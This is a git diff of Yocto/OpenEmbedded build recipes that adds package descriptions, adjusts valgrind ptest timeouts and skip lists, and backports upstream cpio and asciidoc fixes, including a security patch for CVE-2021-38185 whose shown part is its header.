@@ -1,4 +1,5 @@
 SUMMARY = "C#-like programming language for easing GObject programming"
+HOMEPAGE = "http://vala-project.org"
 DESCRIPTION = "Vala is a C#-like language dedicated to ease GObject programming. \
 Vala compiles to plain C and has no runtime environment nor penalities whatsoever."
 SECTION = "devel"
@@ -12,7 +13,6 @@ DEPENDS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'api-doc
 # vala-native contains a native version of vapigen, which we use instead of the target one
 DEPENDS_append_class-target = " vala-native"
 BBCLASSEXTEND = "native"
-HOMEPAGE = "http://vala-project.org"
 LICENSE = "LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
 
diff --git a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
index 7985308e41..0c399ef52c 100644
--- a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
+++ b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
@@ -19,6 +19,11 @@ Upstream-Status: Pending
 Signed-off-by: Dave Lerner <dave.lerner@windriver.com>
 Signed-off-by: Tudor Florea <tudor.florea@enea.com>
 Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
+Increase time limit to 90 s.
+(double of the expected time of drd/tests/std_list on qemuarm64)
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
 ---
  tests/vg_regtest.in | 75 +++++++++++++++++++++++++++++++++++++++--------------
  1 file changed, 55 insertions(+), 20 deletions(-)
@@ -66,7 +71,7 @@ index a441f42..cb05b52 100755
  # Since most of the program time is spent in system() calls, need this to
  # propagate a Ctrl-C enabling us to quit.
 -sub mysystem($) 
-+# Enforce 30 seconds limit for the test.
++# Enforce 90 seconds limit for the test.
 +# This resume execution of the remaining tests if valgrind hangs.
 +sub mysystem($)
  {
@@ -76,7 +81,7 @@ index a441f42..cb05b52 100755
 +    my $exit_code=0;
 +    eval {
 +        local $SIG{'ALRM'} = sub { die "timed out\n" };
-+        alarm(30);
++        alarm(90);
 +        $exit_code = system($_[0]);
 +        alarm (0);
 +        ($exit_code == 2) and die "SIGINT\n";   # 2 is SIGINT
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
index a3a0c6e50f..afa6a94825 100644
--- a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
@@ -31,8 +31,6 @@ drd/tests/annotate_static
 drd/tests/annotate_trace_memory
 drd/tests/annotate_trace_memory_xml
 drd/tests/atomic_var
-drd/tests/bar_bad
-drd/tests/bar_bad_xml
 drd/tests/bar_trivial
 drd/tests/bug-235681
 drd/tests/bug322621
@@ -122,6 +120,7 @@ drd/tests/tc19_shadowmem
 drd/tests/tc21_pthonce
 drd/tests/tc22_exit_w_lock
 drd/tests/tc23_bogus_condwait
+gdbserver_tests/hginfo
 helgrind/tests/annotate_rwlock
 helgrind/tests/annotate_smart_pointer
 helgrind/tests/bar_bad
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-all b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
new file mode 100644
index 0000000000..88a11ca332
--- /dev/null
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
@@ -0,0 +1,4 @@
+drd/tests/bar_bad
+drd/tests/bar_bad_xml
+gdbserver_tests/hginfo
+memcheck/tests/linux/timerfd-syscall
diff --git a/meta/recipes-devtools/valgrind/valgrind/run-ptest b/meta/recipes-devtools/valgrind/valgrind/run-ptest
index 97b0a85dbf..7217dfca5d 100755
--- a/meta/recipes-devtools/valgrind/valgrind/run-ptest
+++ b/meta/recipes-devtools/valgrind/valgrind/run-ptest
@@ -17,6 +17,12 @@ EXP_TOOLS="exp-bbv exp-dhat exp-sgcheck"
 GDB_BIN=@bindir@/gdb
 cd ${VALGRIND_LIB}/ptest && ./gdbserver_tests/make_local_links ${GDB_BIN}
 
+echo "Hide valgrind tests that are non-deterministic"
+echo "Reported at https://bugs.kde.org/show_bug.cgi?id=430321"
+for i in `cat remove-for-all`; do
+   mv $i.vgtest $i.IGNORE;
+done
+
 arch=`arch`
 if [ "$arch" = "aarch64" ]; then
    echo "Aarch64: Hide valgrind tests that result in defunct process and then out of memory"
@@ -44,6 +50,10 @@ if [ "$arch" = "aarch64" ]; then
    done
 fi
 
+echo "Restore valgrind tests that are non-deterministc"
+for i in `cat remove-for-all`; do
+   mv $i.IGNORE $i.vgtest;
+done
 
 passed=`grep PASS: ${LOG}|wc -l`
 failed=`grep FAIL: ${LOG}|wc -l`
diff --git a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
index a764d18177..67999e579a 100644
--- a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
+++ b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Valgrind memory debugger and instrumentation framework"
 HOMEPAGE = "http://valgrind.org/"
+DESCRIPTION = "Valgrind is an instrumentation framework for building dynamic analysis tools. There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail."
 BUGTRACKER = "http://valgrind.org/support/bug_reports.html"
 LICENSE = "GPLv2 & GPLv2+ & BSD"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
@@ -16,6 +17,7 @@ SRC_URI = "https://sourceware.org/pub/valgrind/valgrind-${PV}.tar.bz2 \
            file://Added-support-for-PPC-instructions-mfatbu-mfatbl.patch \
            file://run-ptest \
            file://remove-for-aarch64 \
+           file://remove-for-all \
            file://0004-Fix-out-of-tree-builds.patch \
            file://0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch \
            file://0001-Remove-tests-that-fail-to-build-on-some-PPC32-config.patch \
@@ -105,7 +107,7 @@ VALGRINDARCH_mipsel = "mips32"
 VALGRINDARCH_mips64el = "mips64"
 VALGRINDARCH_powerpc = "ppc"
 VALGRINDARCH_powerpc64 = "ppc64"
-VALGRINDARCH_powerpc64el = "ppc64le"
+VALGRINDARCH_powerpc64le = "ppc64le"
 
 INHIBIT_PACKAGE_STRIP_FILES = "${PKGD}${libdir}/valgrind/vgpreload_memcheck-${VALGRINDARCH}-linux.so"
 
@@ -171,6 +173,7 @@ do_install_ptest() {
     # The scripts reference config.h so add it to the top ptest dir.
     cp ${B}/config.h ${D}${PTEST_PATH}
     install -D ${WORKDIR}/remove-for-aarch64 ${D}${PTEST_PATH}
+    install -D ${WORKDIR}/remove-for-all ${D}${PTEST_PATH}
 
     # Add an executable need by none/tests/bigcode
     mkdir ${D}${PTEST_PATH}/perf
diff --git a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
index 7d27c43c83..d988e1ffce 100644
--- a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
+++ b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
@@ -1,5 +1,6 @@
 SUMMARY = "A shell-script tool for converting XML files to various formats"
-HOMEPAGE = "https://releases.pagure.org/xmlto/"
+HOMEPAGE = "https://pagure.io/xmlto"
+DESCRIPTION = "Utility xmlto is a simple shell-script tool for converting XML files to various formats. It serves as easy to use command line frontend to make fine output without remembering many long options and searching for the syntax of the backends."
 SECTION = "docs/xmlto"
 LICENSE = "GPLv2"
 
@@ -29,7 +30,7 @@ RDEPENDS_${PN}_append_class-target = " \
                   libxslt-bin \
                   coreutils \
 "
-CACHED_CONFIGUREVARS += "ac_cv_path_TAIL=tail"
+CACHED_CONFIGUREVARS += "ac_cv_path_TAIL=tail ac_cv_path_GREP=grep"
 
 BBCLASSEXTEND = "native"
 
diff --git a/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
new file mode 100644
index 0000000000..14c1cd806e
--- /dev/null
+++ b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
@@ -0,0 +1,42 @@
+From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz>
+Date: Fri, 30 Oct 2020 15:10:35 +0100
+Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151)
+
+Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f
+
+Slightly modified to cleanly apply to asciidoc 8.6.9:
+- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9
+- line numbers corrected to eliminate offset warnings
+
+Upstream-Status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ asciidoc.py | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/asciidoc.py b/asciidoc.py
+index f960e7d8..42868c4b 100755
+--- a/asciidoc.py
++++ b/asciidoc.py
+@@ -30,7 +30,7 @@
+ # Used by asciidocapi.py #
+ VERSION = '8.6.10'           # See CHANGELOG file for version history.
+ 
+-MIN_PYTHON_VERSION = '3.4'  # Require this version of Python or better.
++MIN_PYTHON_VERSION = (3, 4)  # Require this version of Python or better.
+ 
+ # ---------------------------------------------------------------------------
+ # Program constants.
+@@ -4704,8 +4704,8 @@ def init(self, cmd):
+         directory.
+         cmd is the asciidoc command or asciidoc.py path.
+         """
+-        if float(sys.version[:3]) < float(MIN_PYTHON_VERSION):
+-            message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION)
++        if sys.version_info[:2] < MIN_PYTHON_VERSION:
++            message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION)
+             sys.exit(1)
+         if not os.path.exists(cmd):
+             message.stderr('FAILED: Missing asciidoc command: %s' % cmd)
diff --git a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
index 751bf0f19f..325ff9aa15 100644
--- a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
+++ b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
@@ -8,8 +8,9 @@ LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \
                     file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069"
 
-SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https \
-           file://auto-catalogs.patch"
+SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=main \
+           file://auto-catalogs.patch \
+           file://detect-python-version.patch"
 SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0"
 PV .= "+py3-git${SRCPV}"
 
diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc
index 1ebb33bdcd..4e6176d2e6 100644
--- a/meta/recipes-extended/bash/bash.inc
+++ b/meta/recipes-extended/bash/bash.inc
@@ -1,5 +1,6 @@
 SUMMARY = "An sh-compatible command language interpreter"
 HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html"
+DESCRIPTION = "Bash is the GNU Project's Bourne Again SHell, a complete implementation of the IEEE POSIX and Open Group shell specification with interactive command line editing, job control on architectures that support it, csh-like features such as history substitution and brace expansion, and a slew of other features."
 SECTION = "base/shell"
 
 DEPENDS = "ncurses bison-native virtual/libiconv"
@@ -48,6 +49,11 @@ do_compile_ptest () {
 	oe_runmake buildtest
 }
 
+do_install_prepend () {
+	# Ensure determinism as this counter increases for each make call
+	rm -f ${B}/.build
+}
+
 do_install_append () {
 	# Move /usr/bin/bash to /bin/bash, if need
 	if [ "${base_bindir}" != "${bindir}" ]; then
diff --git a/meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch b/meta/recipes-extended/bash/bash/CVE-2019-18276.patch
index 7b2073201e..7b2073201e 100644
--- a/meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch
+++ b/meta/recipes-extended/bash/bash/CVE-2019-18276.patch
diff --git a/meta/recipes-extended/bash/bash_5.0.bb b/meta/recipes-extended/bash/bash_5.0.bb
index 257a03bd8b..53e05869ce 100644
--- a/meta/recipes-extended/bash/bash_5.0.bb
+++ b/meta/recipes-extended/bash/bash_5.0.bb
@@ -30,7 +30,7 @@ SRC_URI = "${GNU_MIRROR}/bash/${BP}.tar.gz;name=tarball \
            file://run-ptest \
            file://run-bash-ptests \
            file://fix-run-builtins.patch \
-           file://bash-CVE-2019-18276.patch \
+           file://CVE-2019-18276.patch \
            "
 
 SRC_URI[tarball.md5sum] = "2b44b47b905be16f45709648f671820b"
diff --git a/meta/recipes-extended/bc/bc_1.07.1.bb b/meta/recipes-extended/bc/bc_1.07.1.bb
index 4a51302492..8ed10d14c2 100644
--- a/meta/recipes-extended/bc/bc_1.07.1.bb
+++ b/meta/recipes-extended/bc/bc_1.07.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Arbitrary precision calculator language"
 HOMEPAGE = "http://www.gnu.org/software/bc/bc.html"
+DESCRIPTION = "bc is an arbitrary precision numeric processing language. Syntax is similar to C, but differs in many substantial areas. It supports interactive execution of statements."
 
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
@@ -31,4 +32,4 @@ do_compile_prepend() {
 ALTERNATIVE_${PN} = "bc dc"
 ALTERNATIVE_PRIORITY = "100"
 
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am
index dcf64584d9..adc85a62b2 100644
--- a/meta/recipes-extended/bzip2/bzip2/Makefile.am
+++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am
@@ -1,6 +1,6 @@
 
 lib_LTLIBRARIES = libbz2.la
-libbz2_la_LDFLAGS = -version-info 1:6:0
+libbz2_la_LDFLAGS = -version-info 1:8:0
 
 libbz2_la_SOURCES = blocksort.c  \
                     huffman.c    \
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
new file mode 100644
index 0000000000..2dfd348d7c
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
@@ -0,0 +1,58 @@
+From d257e47a6c6b41ba727b196ac96c05ab91bd9d65 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 7 Apr 2023 11:23:37 +0300
+Subject: [PATCH 3/4] Fix calculation of CRC in copy-out mode.
+
+* src/copyout.c (read_for_checksum): Fix type of the file_size argument.
+Rewrite the reading loop.
+
+Original patch by Stefano Babic <sbabic@denx.de>
+
+Upstream-Status: Backport [a1b2f7871c3ae5113e0102b870b15ea06a8f0e3d]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ src/copyout.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..f1ff351 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -34,27 +34,25 @@
+    compute and return a checksum for them.  */
+ 
+ static uint32_t
+-read_for_checksum (int in_file_des, int file_size, char *file_name)
++read_for_checksum (int in_file_des, off_t file_size, char *file_name)
+ {
+   uint32_t crc;
+-  char buf[BUFSIZ];
+-  int bytes_left;
+-  int bytes_read;
+-  int i;
++  unsigned char buf[BUFSIZ];
++  ssize_t bytes_read;
++  ssize_t i;
+ 
+   crc = 0;
+ 
+-  for (bytes_left = file_size; bytes_left > 0; bytes_left -= bytes_read)
++  while (file_size > 0)
+     {
+       bytes_read = read (in_file_des, buf, BUFSIZ);
+       if (bytes_read < 0)
+ 	error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+       if (bytes_read == 0)
+ 	break;
+-      if (bytes_left < bytes_read)
+-        bytes_read = bytes_left;
+-      for (i = 0; i < bytes_read; ++i)
++      for (i = 0; i < bytes_read; i++)
+ 	crc += buf[i] & 0xff;
++      file_size -= bytes_read;
+     }
+   if (lseek (in_file_des, 0L, SEEK_SET))
+     error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+-- 
+2.39.2
+
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
new file mode 100644
index 0000000000..c212bddf7d
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
@@ -0,0 +1,312 @@
+From 8513495ab5cfb63eb7c4c933fdf0b78c6196cd27 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 28 Apr 2023 15:23:46 +0300
+Subject: [PATCH 4/4] Fix appending to archives bigger than 2G
+
+* src/extern.h (last_header_start): Change type to off_t.
+* src/global.c: Likewise.
+* src/util.c (prepare_append): Use off_t for file offsets.
+
+Upstream-Status: Backport [0987d63384f0419b4b14aecdc6a61729b75ce86a]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ src/extern.h | 11 ++++-----
+ src/global.c |  2 +-
+ src/util.c   | 66 ++++++++++++++++++++++++++--------------------------
+ 3 files changed, 39 insertions(+), 40 deletions(-)
+
+diff --git a/src/extern.h b/src/extern.h
+index 11ac6bf..12f14a9 100644
+--- a/src/extern.h
++++ b/src/extern.h
+@@ -67,7 +67,7 @@ extern int ignore_devno_option;
+ 
+ extern bool to_stdout_option;
+ 
+-extern int last_header_start;
++extern off_t last_header_start;
+ extern int copy_matching_files;
+ extern int numeric_uid;
+ extern char *pattern_file_name;
+@@ -123,7 +123,7 @@ void field_width_error (const char *filename, const char *fieldname,
+ 
+ /* copypass.c */
+ void process_copy_pass (void);
+-int link_to_maj_min_ino (char *file_name, int st_dev_maj, 
++int link_to_maj_min_ino (char *file_name, int st_dev_maj,
+ 			 int st_dev_min, ino_t st_ino);
+ int link_to_name (char const *link_name, char const *link_target);
+ 
+@@ -171,7 +171,7 @@ void copy_files_tape_to_disk (int in_des, int out_des, off_t num_bytes);
+ void copy_files_disk_to_tape (int in_des, int out_des, off_t num_bytes, char *filename);
+ void copy_files_disk_to_disk (int in_des, int out_des, off_t num_bytes, char *filename);
+ void warn_if_file_changed (char *file_name, off_t old_file_size,
+-                           time_t old_file_mtime);
++			   time_t old_file_mtime);
+ void create_all_directories (char const *name);
+ void prepare_append (int out_file_des);
+ char *find_inode_file (ino_t node_num,
+@@ -185,7 +185,7 @@ void set_new_media_message (char *message);
+ #ifdef HPUX_CDF
+ char *add_cdf_double_slashes (char *filename);
+ #endif
+-void write_nuls_to_file (off_t num_bytes, int out_des, 
++void write_nuls_to_file (off_t num_bytes, int out_des,
+ 			 void (*writer) (char *in_buf,
+ 					 int out_des, off_t num_bytes));
+ #define DISK_IO_BLOCK_SIZE	512
+@@ -229,6 +229,5 @@ void delay_set_stat (char const *file_name, struct stat *st,
+ 		     mode_t invert_permissions);
+ int repair_delayed_set_stat (struct cpio_file_stat *file_hdr);
+ void apply_delayed_set_stat (void);
+-     
+-int arf_stores_inode_p (enum archive_format arf);
+ 
++int arf_stores_inode_p (enum archive_format arf);
+diff --git a/src/global.c b/src/global.c
+index fb3abe9..5c9fc05 100644
+--- a/src/global.c
++++ b/src/global.c
+@@ -114,7 +114,7 @@ int debug_flag = false;
+ 
+ /* File position of last header read.  Only used during -A to determine
+    where the old TRAILER!!! record started.  */
+-int last_header_start = 0;
++off_t last_header_start = 0;
+ 
+ /* With -i; if true, copy only files that match any of the given patterns;
+    if false, copy only files that do not match any of the patterns. (-f) */
+diff --git a/src/util.c b/src/util.c
+index 4421b20..3be89a4 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -60,8 +60,8 @@ tape_empty_output_buffer (int out_des)
+   static long output_bytes_before_lseek = 0;
+ 
+   /* Some tape drivers seem to have a signed internal seek pointer and
+-     they lose if it overflows and becomes negative (e.g. when writing 
+-     tapes > 2Gb).  Doing an lseek (des, 0, SEEK_SET) seems to reset the 
++     they lose if it overflows and becomes negative (e.g. when writing
++     tapes > 2Gb).  Doing an lseek (des, 0, SEEK_SET) seems to reset the
+      seek pointer and prevent it from overflowing.  */
+   if (output_is_special
+      && ( (output_bytes_before_lseek += output_size) >= 1073741824L) )
+@@ -106,7 +106,7 @@ static ssize_t sparse_write (int fildes, char *buf, size_t nbyte, bool flush);
+    descriptor OUT_DES and reset `output_size' and `out_buff'.
+    If `swapping_halfwords' or `swapping_bytes' is set,
+    do the appropriate swapping first.  Our callers have
+-   to make sure to only set these flags if `output_size' 
++   to make sure to only set these flags if `output_size'
+    is appropriate (a multiple of 4 for `swapping_halfwords',
+    2 for `swapping_bytes').  The fact that DISK_IO_BLOCK_SIZE
+    must always be a multiple of 4 helps us (and our callers)
+@@ -188,8 +188,8 @@ tape_fill_input_buffer (int in_des, int num_bytes)
+ {
+ #ifdef BROKEN_LONG_TAPE_DRIVER
+   /* Some tape drivers seem to have a signed internal seek pointer and
+-     they lose if it overflows and becomes negative (e.g. when writing 
+-     tapes > 4Gb).  Doing an lseek (des, 0, SEEK_SET) seems to reset the 
++     they lose if it overflows and becomes negative (e.g. when writing
++     tapes > 4Gb).  Doing an lseek (des, 0, SEEK_SET) seems to reset the
+      seek pointer and prevent it from overflowing.  */
+   if (input_is_special
+       && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -332,8 +332,8 @@ tape_buffered_peek (char *peek_buf, int in_des, int num_bytes)
+ 
+ #ifdef BROKEN_LONG_TAPE_DRIVER
+   /* Some tape drivers seem to have a signed internal seek pointer and
+-     they lose if it overflows and becomes negative (e.g. when writing 
+-     tapes > 4Gb).  Doing an lseek (des, 0, SEEK_SET) seems to reset the 
++     they lose if it overflows and becomes negative (e.g. when writing
++     tapes > 4Gb).  Doing an lseek (des, 0, SEEK_SET) seems to reset the
+      seek pointer and prevent it from overflowing.  */
+   if (input_is_special
+       && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -404,7 +404,7 @@ tape_toss_input (int in_des, off_t num_bytes)
+ 
+       if (crc_i_flag && only_verify_crc_flag)
+ 	{
+- 	  int k;
++	  int k;
+ 	  for (k = 0; k < space_left; ++k)
+ 	    crc += in_buff[k] & 0xff;
+ 	}
+@@ -416,14 +416,14 @@ tape_toss_input (int in_des, off_t num_bytes)
+ }
+ 
+ void
+-write_nuls_to_file (off_t num_bytes, int out_des, 
+-                    void (*writer) (char *in_buf, int out_des, off_t num_bytes))
++write_nuls_to_file (off_t num_bytes, int out_des,
++		    void (*writer) (char *in_buf, int out_des, off_t num_bytes))
+ {
+   off_t	blocks;
+   off_t	extra_bytes;
+   off_t	i;
+   static char zeros_512[512];
+-  
++
+   blocks = num_bytes / sizeof zeros_512;
+   extra_bytes = num_bytes % sizeof zeros_512;
+   for (i = 0; i < blocks; ++i)
+@@ -603,7 +603,7 @@ create_all_directories (char const *name)
+   char *dir;
+ 
+   dir = dir_name (name);
+-  
++
+   if (dir == NULL)
+     error (PAXEXIT_FAILURE, 0, _("virtual memory exhausted"));
+ 
+@@ -637,9 +637,9 @@ create_all_directories (char const *name)
+ void
+ prepare_append (int out_file_des)
+ {
+-  int start_of_header;
+-  int start_of_block;
+-  int useful_bytes_in_block;
++  off_t start_of_header;
++  off_t start_of_block;
++  size_t useful_bytes_in_block;
+   char *tmp_buf;
+ 
+   start_of_header = last_header_start;
+@@ -697,8 +697,8 @@ inode_val_compare (const void *val1, const void *val2)
+   const struct inode_val *ival1 = val1;
+   const struct inode_val *ival2 = val2;
+   return ival1->inode == ival2->inode
+-         && ival1->major_num == ival2->major_num
+-         && ival1->minor_num == ival2->minor_num;
++	 && ival1->major_num == ival2->major_num
++	 && ival1->minor_num == ival2->minor_num;
+ }
+ 
+ static struct inode_val *
+@@ -706,10 +706,10 @@ find_inode_val (ino_t node_num, unsigned long major_num,
+ 		 unsigned long minor_num)
+ {
+   struct inode_val sample;
+-  
++
+   if (!hash_table)
+     return NULL;
+-  
++
+   sample.inode = node_num;
+   sample.major_num = major_num;
+   sample.minor_num = minor_num;
+@@ -734,7 +734,7 @@ add_inode (ino_t node_num, char *file_name, unsigned long major_num,
+ {
+   struct inode_val *temp;
+   struct inode_val *e = NULL;
+-  
++
+   /* Create new inode record.  */
+   temp = (struct inode_val *) xmalloc (sizeof (struct inode_val));
+   temp->inode = node_num;
+@@ -1007,7 +1007,7 @@ buf_all_zeros (char *buf, int bufsize)
+ 
+ /* Write NBYTE bytes from BUF to file descriptor FILDES, trying to
+    create holes instead of writing blockfuls of zeros.
+-   
++
+    Return the number of bytes written (including bytes in zero
+    regions) on success, -1 on error.
+ 
+@@ -1027,7 +1027,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+ 
+   enum { begin, in_zeros, not_in_zeros } state =
+ 			   delayed_seek_count ? in_zeros : begin;
+-  
++
+   while (nbytes)
+     {
+       size_t rest = nbytes;
+@@ -1042,7 +1042,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+ 	      if (state == not_in_zeros)
+ 		{
+ 		  ssize_t bytes = buf - start_ptr + rest;
+-		  
++
+ 		  n = write (fildes, start_ptr, bytes);
+ 		  if (n == -1)
+ 		    return -1;
+@@ -1091,8 +1091,8 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+       if (n != 1)
+ 	return n;
+       delayed_seek_count = 0;
+-    }      
+-  
++    }
++
+   return nwritten + seek_count;
+ }
+ 
+@@ -1222,7 +1222,7 @@ set_perms (int fd, struct cpio_file_stat *header)
+   if (!no_chown_flag)
+     {
+       uid_t uid = CPIO_UID (header->c_uid);
+-      gid_t gid = CPIO_GID (header->c_gid); 
++      gid_t gid = CPIO_GID (header->c_gid);
+       if ((fchown_or_chown (fd, header->c_name, uid, gid) < 0)
+ 	  && errno != EPERM)
+ 	chown_error_details (header->c_name, uid, gid);
+@@ -1239,13 +1239,13 @@ set_file_times (int fd,
+ 		const char *name, unsigned long atime, unsigned long mtime)
+ {
+   struct timespec ts[2];
+-  
++
+   memset (&ts, 0, sizeof ts);
+ 
+   ts[0].tv_sec = atime;
+   ts[1].tv_sec = mtime;
+ 
+-  /* Silently ignore EROFS because reading the file won't have upset its 
++  /* Silently ignore EROFS because reading the file won't have upset its
+      timestamp if it's on a read-only filesystem. */
+   if (fdutimens (fd, name, ts) < 0 && errno != EROFS)
+     utime_error (name);
+@@ -1297,7 +1297,7 @@ cpio_safer_name_suffix (char *name, bool link_target, bool absolute_names,
+ 
+ /* This is a simplified form of delayed set_stat used by GNU tar.
+    With the time, both forms will merge and pass to paxutils
+-   
++
+    List of directories whose statuses we need to extract after we've
+    finished extracting their subsidiary files.  If you consider each
+    contiguous subsequence of elements of the form [D]?[^D]*, where [D]
+@@ -1415,7 +1415,7 @@ cpio_mkdir (struct cpio_file_stat *file_hdr, int *setstat_delayed)
+ {
+   int rc;
+   mode_t mode = file_hdr->c_mode;
+-  
++
+   if (!(file_hdr->c_mode & S_IWUSR))
+     {
+       rc = mkdir (file_hdr->c_name, mode | S_IWUSR);
+@@ -1438,10 +1438,10 @@ cpio_create_dir (struct cpio_file_stat *file_hdr, int existing_dir)
+ {
+   int res;			/* Result of various function calls.  */
+   int setstat_delayed = 0;
+-  
++
+   if (to_stdout_option)
+     return 0;
+-  
++
+   /* Strip any trailing `/'s off the filename; tar puts
+      them on.  We might as well do it here in case anybody
+      else does too, since they cause strange things to happen.  */
+@@ -1530,7 +1530,7 @@ arf_stores_inode_p (enum archive_format arf)
+     }
+   return 1;
+ }
+-  
++
+ void
+ cpio_file_stat_init (struct cpio_file_stat *file_hdr)
+ {
+-- 
+2.39.2
+
diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
new file mode 100644
index 0000000000..6ceafeee49
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
@@ -0,0 +1,581 @@
+GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted
+pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers
+an out-of-bounds heap write.
+
+CVE: CVE-2021-38185
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 7 Aug 2021 12:52:21 +0300
+Subject: [PATCH 1/3] Rewrite dynamic string support.
+
+* src/dstring.c (ds_init): Take a single argument.
+(ds_free): New function.
+(ds_resize): Take a single argument.  Use x2nrealloc to expand
+the storage.
+(ds_reset,ds_append,ds_concat,ds_endswith): New function.
+(ds_fgetstr): Rewrite.  In particular, this fixes integer overflow.
+* src/dstring.h (dynamic_string): Keep both the allocated length
+(ds_size) and index of the next free byte in the string (ds_idx).
+(ds_init,ds_resize): Change signature.
+(ds_len): New macro.
+(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos.
+* src/copyin.c: Use new ds_ functions.
